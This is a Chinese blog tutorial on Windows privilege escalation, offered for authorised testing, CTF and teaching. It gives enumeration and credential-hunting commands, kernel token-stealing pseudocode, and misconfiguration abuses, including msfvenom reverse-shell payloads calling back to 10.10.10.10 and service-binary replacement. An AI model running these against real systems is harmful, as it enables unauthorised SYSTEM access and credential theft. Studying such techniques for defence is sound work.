<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>Windows提权小结 | Liebert77の博客</title><meta name="author" content="Liebert77"><meta name="copyright" content="Liebert77"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="Windows提权小结">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows提权小结">
<meta property="og:url" content="https://liebert77.github.io/posts/778cb5e4/">
<meta property="og:site_name" content="Liebert77の博客">
<meta property="og:description" content="Windows提权小结">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z.wiki/u/1774pAqTn">
<meta property="article:published_time" content="2026-08-23T13:00:00.000Z">
<meta property="article:modified_time" content="2026-08-24T10:38:45.014Z">
<meta property="article:author" content="Liebert77">
<meta property="article:tag" content="技术杂项">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z.wiki/u/1774pAqTn"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "Windows提权小结",
  "url": "https://liebert77.github.io/posts/778cb5e4/",
  "image": "https://z.wiki/u/1774pAqTn",
  "datePublished": "2026-08-23T13:00:00.000Z",
  "dateModified": "2026-08-24T10:38:45.014Z",
  "author": [
    {
      "@type": "Person",
      "name": "Liebert77",
      "url": "https://liebert77.github.io/"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://liebert77.github.io/posts/778cb5e4/"><link rel="preconnect" href="https://cdnjs.onmicrosoft.cn"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdnjs.onmicrosoft.cn/ajax/libs/font-awesome/6.7.2/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!true && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":true,"top_n_per_article":1,"unescape":false,"languages":{"hits_empty":"未找到符合您查询的内容：${query}","hits_stats":"共找到 ${hits} 篇文章"}},
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":230,"highlightFullpage":true,"highlightMacStyle":true},
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdnjs.onmicrosoft.cn/ajax/libs/egjs-infinitegrid/4.12.0/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: true,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Windows提权小结',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><link rel="stylesheet" href="/css/custom.css?v=20260824-2"><link rel="dns-prefetch" href="//cdnjs.onmicrosoft.cn"><link rel="dns-prefetch" href="//npm.onmicrosoft.cn"><link rel="stylesheet" href="https://npm.onmicrosoft.cn/@fontsource/jetbrains-mono@5.0.18/index.css"><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.onmicrosoft.cn/hexo-butterfly-footer-beautify@1.0.0/lib/runtime.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://npm.onmicrosoft.cn/hexo-butterfly-swiper/lib/swiper.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://npm.onmicrosoft.cn/hexo-butterfly-swiper/lib/swiperstyle.css" media="print" onload="this.media='all'"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><script>(()=>{
  const $loadingBox = document.getElementById('loading-box')
  const $body = document.body
  const preloader = {
    endLoading: () => {
      $body.style.overflow = ''
      $loadingBox.classList.add('loaded')
    },
    initLoading: () => {
      $body.style.overflow = 'hidden'
      $loadingBox.classList.remove('loaded')
    }
  }

  preloader.initLoading()
  window.addEventListener('load', preloader.endLoading)

  if (true) {
    btf.addGlobalFn('pjaxSend', preloader.initLoading, 'preloader_init')
    btf.addGlobalFn('pjaxComplete', preloader.endLoading, 'preloader_end')
  }
})()</script><div id="web_bg" style="background-image: url(https://pic8.fukit.cn/autoupload/JzKGvcr2-C5XkMEml_gM2diO_OyvX7mIgxFBfDMDErs/20260224/3EkX/1692X950/qianxiao.png/webp);"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src= "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-lazy-src="/img/head.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">46</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">25</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(https://z.wiki/u/1774pAqTn);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Liebert77の博客</span></a><a class="nav-page-title" href="/"><span class="site-name">Windows提权小结</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="search-button"><span class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></span></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">Windows提权小结</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="fa-fw post-meta-icon far fa-calendar-alt"></i><span class="post-meta-label">发表于</span><time datetime="2026-08-23T13:00:00.000Z" title="发表于 2026-08-23 21:00:00">2026-08-23</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%8A%80%E6%9C%AF%E6%9D%82%E9%A1%B9/">技术杂项</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">总字数:</span><span class="word-count">3.8k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>15分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><div id="post-outdate-notice" data="{&quot;limitDay&quot;:365,&quot;messagePrev&quot;:&quot;It has been&quot;,&quot;messageNext&quot;:&quot;days since the last update, the content of the article may be outdated.&quot;,&quot;postUpdate&quot;:&quot;2026-08-24 18:38:45&quot;}" hidden></div><blockquote>
<p>本文仅供安全研究、授权渗透测试、CTF 竞赛与防御教学使用。未经授权对他人系统实施提权攻击属于违法行为。</p>
</blockquote>
<h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p>Windows 提权（Privilege Escalation）是渗透测试中的核心环节。攻击者获得初始 foothold 后通常只有低权限 shell，需要将权限提升到 <strong>NT AUTHORITY\SYSTEM</strong> 或本地管理员才能实现凭据窃取、横向移动和持久化控制。</p>
<p>本文将 Windows 提权技术分为六大类，按<strong>内核漏洞 → 配置错误 → 特权滥用 → UAC 绕过 → 凭据窃取 → 域环境</strong>的逻辑展开，力求分类清晰、覆盖全面。</p>
<hr>
<h2 id="一、Windows-权限体系基础"><a href="#一、Windows-权限体系基础" class="headerlink" title="一、Windows 权限体系基础"></a>一、Windows 权限体系基础</h2><p>理解提权的前提是理解 Windows 的权限模型。</p>
<h3 id="1-1-用户角色"><a href="#1-1-用户角色" class="headerlink" title="1.1 用户角色"></a>1.1 用户角色</h3><table>
<thead>
<tr>
<th>角色</th>
<th>权限级别</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><strong>SYSTEM</strong></td>
<td>最高</td>
<td>内核级身份，提权的终极目标</td>
</tr>
<tr>
<td><strong>Administrator</strong></td>
<td>高</td>
<td>本地管理员，受 UAC 约束</td>
</tr>
<tr>
<td><strong>标准用户</strong></td>
<td>中</td>
<td>受 UAC、完整性级别和 ACL 限制</td>
</tr>
<tr>
<td>Network Service</td>
<td>低</td>
<td>网络服务账户</td>
</tr>
<tr>
<td>Local Service</td>
<td>低</td>
<td>本地服务账户</td>
</tr>
</tbody></table>
<h3 id="1-2-完整性级别（Integrity-Level）"><a href="#1-2-完整性级别（Integrity-Level）" class="headerlink" title="1.2 完整性级别（Integrity Level）"></a>1.2 完整性级别（Integrity Level）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">System (0x4000) — NT AUTHORITY\SYSTEM<br>High   (0x3000) — Elevated administrator<br>Medium (0x2000) — Standard non-admin user<br>Low    (0x1000) — Sandboxed processes<br></code></pre></td></tr></table></figure>

<p>Medium Integrity 进程无法向 High Integrity 进程写入内存或打开其令牌。</p>
<h3 id="1-3-UAC-机制"><a href="#1-3-UAC-机制" class="headerlink" title="1.3 UAC 机制"></a>1.3 UAC 机制</h3><p>管理员登录时 Windows 创建两个令牌：</p>
<ul>
<li><strong>Filtered Token</strong>（中等完整性）— 日常操作使用</li>
<li><strong>Full Token</strong>（高完整性）— 需要提升时使用</li>
</ul>
<blockquote>
<p>UAC 不是安全边界（Security Boundary），微软多次声明其设计目标是提醒管理员，而非阻止恶意代码。</p>
</blockquote>
<h3 id="1-4-关键特权"><a href="#1-4-关键特权" class="headerlink" title="1.4 关键特权"></a>1.4 关键特权</h3><p>通过 <code>whoami /priv</code> 查看，以下特权可被滥用：</p>
<table>
<thead>
<tr>
<th>特权</th>
<th>提权方式</th>
</tr>
</thead>
<tbody><tr>
<td><strong>SeImpersonatePrivilege</strong></td>
<td>Potato 系列攻击，模拟 SYSTEM 令牌</td>
</tr>
<tr>
<td><strong>SeDebugPrivilege</strong></td>
<td>附加高权限进程、窃取令牌</td>
</tr>
<tr>
<td><strong>SeBackupPrivilege</strong></td>
<td>读取 SAM&#x2F;SYSTEM 数据库</td>
</tr>
<tr>
<td><strong>SeRestorePrivilege</strong></td>
<td>覆盖系统文件或 DLL 劫持</td>
</tr>
<tr>
<td><strong>SeTakeOwnershipPrivilege</strong></td>
<td>接管文件&#x2F;注册表所有权后修改权限</td>
</tr>
<tr>
<td><strong>SeLoadDriverPrivilege</strong></td>
<td>加载恶意驱动执行内核代码</td>
</tr>
<tr>
<td><strong>SeAssignPrimaryTokenPrivilege</strong></td>
<td>与 SeImpersonate 配合替换进程令牌</td>
</tr>
</tbody></table>
<blockquote>
<p>IIS 应用池、SQL Server、WinRM、Exchange 等服务账户默认拥有 SeImpersonatePrivilege，是 Potato 攻击的高频目标。</p>
</blockquote>
<hr>
<h2 id="二、提权前置：信息收集"><a href="#二、提权前置：信息收集" class="headerlink" title="二、提权前置：信息收集"></a>二、提权前置：信息收集</h2><p>信息收集决定后续攻击方向，是提权的第一步。</p>
<h3 id="2-1-系统信息"><a href="#2-1-系统信息" class="headerlink" title="2.1 系统信息"></a>2.1 系统信息</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 系统信息</span><br>systeminfo<br>hostname<br><br><span class="hljs-comment"># 网络配置</span><br>ipconfig /all<br>netstat -ano<br><br><span class="hljs-comment"># 已安装补丁（关键！）</span><br>wmic qfe get Caption,Description,HotFixID,InstalledOn<br><span class="hljs-comment"># PowerShell</span><br>Get-HotFix | Sort-Object InstalledOn -Descending<br></code></pre></td></tr></table></figure>

<h3 id="2-2-用户与权限"><a href="#2-2-用户与权限" class="headerlink" title="2.2 用户与权限"></a>2.2 用户与权限</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">whoami</span> /all          <span class="hljs-comment"># 完整信息</span><br><span class="hljs-built_in">whoami</span> /priv         <span class="hljs-comment"># 当前特权（关键！）</span><br><span class="hljs-built_in">whoami</span> /groups       <span class="hljs-comment"># 用户所属组</span><br>net user             <span class="hljs-comment"># 所有本地用户</span><br>net localgroup Administrators  <span class="hljs-comment"># 管理员组成员</span><br>net user /domain     <span class="hljs-comment"># 域用户</span><br></code></pre></td></tr></table></figure>

<h3 id="2-3-服务与计划任务"><a href="#2-3-服务与计划任务" class="headerlink" title="2.3 服务与计划任务"></a>2.3 服务与计划任务</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">sc query             <span class="hljs-comment"># 所有服务</span><br>tasklist /svc        <span class="hljs-comment"># 服务及 PID</span><br>wmic service list brief<br>schtasks /query /fo LIST /v  <span class="hljs-comment"># 计划任务</span><br>wmic product get name, version, vendor  <span class="hljs-comment"># 已安装软件</span><br></code></pre></td></tr></table></figure>

<h3 id="2-4-凭据搜索"><a href="#2-4-凭据搜索" class="headerlink" title="2.4 凭据搜索"></a>2.4 凭据搜索</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 搜索包含密码的文件</span><br>findstr /si <span class="hljs-string">&quot;password&quot;</span> *.txt *.ini *.config *.xml 2&gt;nul<br><br><span class="hljs-comment"># Unattend 安装文件</span><br><span class="hljs-built_in">dir</span> /b /s C:\Windows\Panther\unattend.xml 2&gt;nul<br><br><span class="hljs-comment"># PowerShell 历史</span><br><span class="hljs-built_in">type</span> %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt<br><br><span class="hljs-comment"># 凭据管理器</span><br>cmdkey /list<br><br><span class="hljs-comment"># AutoLogon 密码</span><br>reg query <span class="hljs-string">&quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> /v DefaultPassword<br></code></pre></td></tr></table></figure>

<blockquote>
<p>发现保存的凭据后，可尝试 <code>runas /savecred /user:DOMAIN\user cmd.exe</code> 以该用户身份执行命令。</p>
</blockquote>
<hr>
<h2 id="三、内核漏洞提权"><a href="#三、内核漏洞提权" class="headerlink" title="三、内核漏洞提权"></a>三、内核漏洞提权</h2><p>利用未打补丁的 Windows 内核漏洞，通过令牌窃取实现 SYSTEM 提权。这是最直接的路径，但可能导致蓝屏。</p>
<h3 id="3-1-常见-CVE"><a href="#3-1-常见-CVE" class="headerlink" title="3.1 常见 CVE"></a>3.1 常见 CVE</h3><table>
<thead>
<tr>
<th>CVE</th>
<th>补丁编号</th>
<th>漏洞描述</th>
</tr>
</thead>
<tbody><tr>
<td>MS16-032</td>
<td>KB3139914</td>
<td>Secondary Logon 竞争条件</td>
</tr>
<tr>
<td>MS16-135</td>
<td>KB3199135</td>
<td>内核模式驱动内存处理不当</td>
</tr>
<tr>
<td>CVE-2018-8120</td>
<td>KB4103727</td>
<td>Win32k 本地提权</td>
</tr>
<tr>
<td>CVE-2019-1458</td>
<td>KB4512534</td>
<td>Win32k 提权，影响 Win10&#x2F;Server 2019</td>
</tr>
<tr>
<td>CVE-2020-0787</td>
<td>KB4556800</td>
<td>BITS 服务本地提权</td>
</tr>
<tr>
<td>CVE-2021-1732</td>
<td>KB5001401</td>
<td>Win32k 窗口对象类型混淆越界写入</td>
</tr>
<tr>
<td>CVE-2022-37969</td>
<td>KB5014697</td>
<td>UWP 本地提权</td>
</tr>
<tr>
<td>CVE-2024-21338</td>
<td>多个</td>
<td>appid.sys 驱动 IOCTL 处理不当</td>
</tr>
</tbody></table>
<h3 id="3-2-令牌窃取原理"><a href="#3-2-令牌窃取原理" class="headerlink" title="3.2 令牌窃取原理"></a>3.2 令牌窃取原理</h3><p>内核漏洞利用的核心是<strong>令牌窃取</strong>（Token Stealing）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1. 通过内核读写原语找到 SYSTEM 进程的 EPROCESS<br>2. 遍历 ActiveProcessLinks 链表定位 PID 4（System 进程）<br>3. 获取 System 进程的 Token<br>4. 将当前进程的 Token 替换为 System Token<br>5. 当前进程获得 SYSTEM 权限<br></code></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// 伪代码示意</span><br>EPROCESS *system_eprocess = FindSystemProcess();<br>HANDLE system_token = system_eprocess-&gt;Token;<br>current_eprocess-&gt;Token = system_token;  <span class="hljs-comment">// 替换令牌</span><br></code></pre></td></tr></table></figure>

<h3 id="3-3-漏洞检测工具"><a href="#3-3-漏洞检测工具" class="headerlink" title="3.3 漏洞检测工具"></a>3.3 漏洞检测工具</h3><table>
<thead>
<tr>
<th>工具</th>
<th>语言</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Watson</strong></td>
<td>C#</td>
<td>扫描补丁与漏洞数据库，列出可利用漏洞</td>
</tr>
<tr>
<td><strong>Windows Exploit Suggester</strong></td>
<td>Python</td>
<td>systeminfo 与漏洞库匹配，标记公开 Exploit</td>
</tr>
<tr>
<td><strong>Sherlock</strong></td>
<td>PowerShell</td>
<td>快速检测已知提权漏洞</td>
</tr>
</tbody></table>
<p>WES 典型工作流：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 1. 获取系统信息</span><br>systeminfo &gt; systeminfo.txt<br><br><span class="hljs-comment"># 2. 更新数据库</span><br>python windows-exploit-suggester.py --update<br><br><span class="hljs-comment"># 3. 扫描匹配</span><br>python windows-exploit-suggester.py --systeminfo systeminfo.txt<br><br><span class="hljs-comment"># 4. 搜索 Exploit</span><br>searchsploit CVE-2021-1732<br></code></pre></td></tr></table></figure>

<blockquote>
<p>内核 Exploit 可能导致蓝屏，生产环境需谨慎。务必先确认系统版本、位数和补丁状态。</p>
</blockquote>
<hr>
<h2 id="四、配置错误提权"><a href="#四、配置错误提权" class="headerlink" title="四、配置错误提权"></a>四、配置错误提权</h2><p>配置错误提权不依赖未修补漏洞，而是利用管理员配置不当。在补丁完善的系统上同样有效，是实际渗透中最常见的提权路径。</p>
<h3 id="4-1-未引用服务路径（Unquoted-Service-Path）"><a href="#4-1-未引用服务路径（Unquoted-Service-Path）" class="headerlink" title="4.1 未引用服务路径（Unquoted Service Path）"></a>4.1 未引用服务路径（Unquoted Service Path）</h3><p>服务二进制路径含空格且未加引号时，Windows 按空格逐段解析：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">路径: C:\Program Files\Inventory Service\svc.exe<br>解析顺序:<br>  1. C:\Program.exe<br>  2. C:\Program Files\Inventory.exe<br>  3. C:\Program Files\Inventory Service\svc.exe (正确路径)<br></code></pre></td></tr></table></figure>

<p>攻击者在可写分段位置放置恶意 exe 即可以 SYSTEM 权限执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 查找未引用路径服务</span><br>wmic service get name,displayname,pathname,startmode | findstr /i <span class="hljs-string">&quot;auto&quot;</span> | findstr /iv <span class="hljs-string">&quot;c:\windows&quot;</span> | findstr /iv <span class="hljs-string">&quot;&quot;</span><span class="hljs-string">&quot;</span><br><span class="hljs-string"></span><br><span class="hljs-string"># 检查路径可写性</span><br><span class="hljs-string">accesschk.exe /accepteula -uwdq &quot;</span>C:\Program Files\Inventory Service<span class="hljs-string">&quot;</span><br><span class="hljs-string"></span><br><span class="hljs-string"># 生成恶意 exe</span><br><span class="hljs-string">msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o &quot;</span>C:\Program.exe<span class="hljs-string">&quot;</span><br><span class="hljs-string"></span><br><span class="hljs-string"># 触发</span><br><span class="hljs-string">sc stop &quot;</span>ServiceName<span class="hljs-string">&quot; &amp;&amp; sc start &quot;</span>ServiceName<span class="hljs-string">&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="4-2-服务权限配置错误"><a href="#4-2-服务权限配置错误" class="headerlink" title="4.2 服务权限配置错误"></a>4.2 服务权限配置错误</h3><p>当前用户对服务二进制或服务配置有写权限时，可直接替换或修改：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检查谁可以修改服务</span><br>accesschk.exe -accepteula -ucqv <span class="hljs-string">&quot;Users&quot;</span> *<br><br><span class="hljs-comment"># 方法一：替换二进制</span><br>copy evil.exe <span class="hljs-string">&quot;C:\Program Files\App\service.exe&quot;</span><br>sc stop <span class="hljs-string">&quot;ServiceName&quot;</span> &amp;&amp; sc start <span class="hljs-string">&quot;ServiceName&quot;</span><br><br><span class="hljs-comment"># 方法二：修改 binPath（需 SERVICE_CHANGE_CONFIG）</span><br>sc config <span class="hljs-string">&quot;ServiceName&quot;</span> binpath= <span class="hljs-string">&quot;C:\evil\backdoor.exe&quot;</span><br>sc start <span class="hljs-string">&quot;ServiceName&quot;</span><br></code></pre></td></tr></table></figure>

<p>PowerUp 自动化检测与利用：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">Import-Module</span> .\PowerUp.ps1<br><span class="hljs-built_in">Get-ServiceUnquoted</span>      <span class="hljs-comment"># 未引用路径</span><br><span class="hljs-built_in">Get-ServiceEXEPerms</span>      <span class="hljs-comment"># 二进制可写</span><br><span class="hljs-built_in">Get-ServicePerms</span>         <span class="hljs-comment"># 可修改配置</span><br><span class="hljs-built_in">Invoke-ServiceAbuse</span> <span class="hljs-literal">-ServiceName</span> <span class="hljs-string">&quot;VulnSVC&quot;</span> <span class="hljs-literal">-Command</span> <span class="hljs-string">&quot;cmd.exe /c whoami&quot;</span><br></code></pre></td></tr></table></figure>

<h3 id="4-3-AlwaysInstallElevated"><a href="#4-3-AlwaysInstallElevated" class="headerlink" title="4.3 AlwaysInstallElevated"></a>4.3 AlwaysInstallElevated</h3><p>组策略允许非管理员以 SYSTEM 权限运行 MSI 包。以下两个注册表键<strong>同时为 1</strong> 时可利用：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 检测</span><br>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated<br>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated<br><br><span class="hljs-comment"># 生成恶意 MSI</span><br>msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi<br><br><span class="hljs-comment"># 安装（以 SYSTEM 执行）</span><br>msiexec /quiet /qn /i evil.msi<br></code></pre></td></tr></table></figure>

<h3 id="4-4-注册表权限错误"><a href="#4-4-注册表权限错误" class="headerlink" title="4.4 注册表权限错误"></a>4.4 注册表权限错误</h3><p>对自启动项或服务注册表项有写权限时，可植入恶意程序：</p>
